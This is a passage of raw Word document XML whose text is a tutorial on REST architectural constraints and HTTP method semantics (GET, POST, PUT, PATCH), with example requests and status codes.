    <w:p w14:paraId="44EC3DC5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Cache-Control: max-age=3600 (cache for 1 hour)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360A8CFA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     ETag: "33a64df551425fcc55e4d42a148795d9f25f89d" (version identifier)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCF2790" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Last-Modified: Wed, 21 Oct 2024 07:28:00 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2DA9DD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="35DA4200" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>4. Uniform Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122D51E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   The central REST constraint — four sub-constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00568E95" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A8A3D4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   a. Resource identification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A1AA3F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Resources identified by URIs (not actions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D1DDE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      /users/123 identifies a user, not "getUserById"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F97AE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAAB35F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   b. Manipulation through representations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB01017" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Client has enough information to modify/delete resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C660E42" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      via the representation it receives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323DD3E4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F6AA79" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   c. Self-descriptive messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F692DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Each message includes enough information to describe itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036CF6E4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Content-Type: application/json tells client how to parse body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06482AC6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199DAC46" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   d. Hypermedia as the engine of application state (HATEOAS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E6B1B3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Responses include links to related actions/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C09AD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Client navigates by following links (not hardcoded URLs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434C1008" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      (Most REST APIs don't implement HATEOAS — they're REST-ish, not REST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580FE91B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="756EA7B8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>5. Layered System:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312521CD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Client doesn't know whether it's talking directly to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788E74EF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   or to an intermediary (load balancer, cache, API gateway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C28EF43" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196F8953" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Enables: CDN caching, API gateways, reverse proxies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F40087" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            transparently inserted between client and server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C530E8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5CF20367" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>6. Code on Demand (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B797F6D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Server can send executable code to client (JavaScript)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1A5FDA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Rarely used in API contexts (browser-specific)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DBED37" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The practical REST implementation — what most "REST APIs" actually are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D28013D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C46C16" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Most production "REST APIs" implement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34735A31" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Stateless request-response over HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857C73E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - JSON payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A836D43" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Resource-oriented URL design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F039814" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - HTTP methods for CRUD semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE10F4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - HTTP status codes for error signaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D4ABD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF9164C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>They do NOT implement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D908B8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - HATEOAS (almost never)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E307400" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Strict statelessness (often have session state)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DF1931" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Proper cache semantics (often set no-cache on everything)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D62393" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521F8FC6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>This is sometimes called "REST-ish" or "HTTP APIs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB82D0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Fielding himself has criticized these as "not REST"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43361DE9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>But: pragmatic HTTP+JSON APIs are what the industry means by "REST"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E263DE7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP Semantics — The Foundation of REST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C217A9E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP methods and their precise semantics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B69E5F9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A874ED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419A580D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Retrieve a resource representation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5930CE27" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Safe: MUST NOT change server state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4061896E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Idempotent: multiple identical requests → same result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E223F0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Cacheable: by default (with appropriate headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1689AC5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA6677E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET /users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDD2258" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 200 OK + user JSON body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B4E14" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 404 Not Found (user doesn't exist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176F3361" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 304 Not Modified (client has valid cached version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2012C91C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBA0BD8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET with body: technically allowed by HTTP spec but undefined semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B651AAF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                 Most servers/proxies strip GET bodies — don't use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BD94C5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="34014AAB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>POST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309A5AC3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Create a new resource or trigger an action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C98C01C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  NOT safe: changes server state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0EC0C5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  NOT idempotent: multiple requests create multiple resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0006342A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  NOT cacheable by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090BE6A2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B913F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  POST /orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731FEE73" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Body: {product_id: 456, quantity: 2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0BB43B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 201 Created + Location: /orders/789 + order body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0DF80C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 400 Bad Request (invalid payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1E289" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 422 Unprocessable Entity (valid JSON but invalid business logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C9D7B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088226E4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  POST for non-CRUD actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041ABCF1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  POST /payments/789/refund  ← trigger action (not creating a "refund resource")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CF214D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  POST /search               ← complex queries too long for URL params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D3FD7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="49C71623" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>PUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A92071" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Replace resource entirely (full update)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744E862F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Idempotent: multiple identical requests → same state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037EB216" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  NOT safe: changes server state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E82B6F5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B19AFC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  PUT /users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2393A86A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Body: {name: "Alice", email: "alice@example.com", role: "admin"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B0AF70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 200 OK + updated resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F476015" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 204 No Content (success, no body returned)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703E0454" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163910B7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Semantics: client sends COMPLETE representation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2642FC3F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">             Fields not included are set to null/default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3C677" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">             (contrast with PATCH: only included fields updated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4171AB4E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="40C5B4B7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>PATCH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2A11A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Partial update — only included fields modified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDB4D5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  NOT idempotent by default (depends on patch semantics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33F0C9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
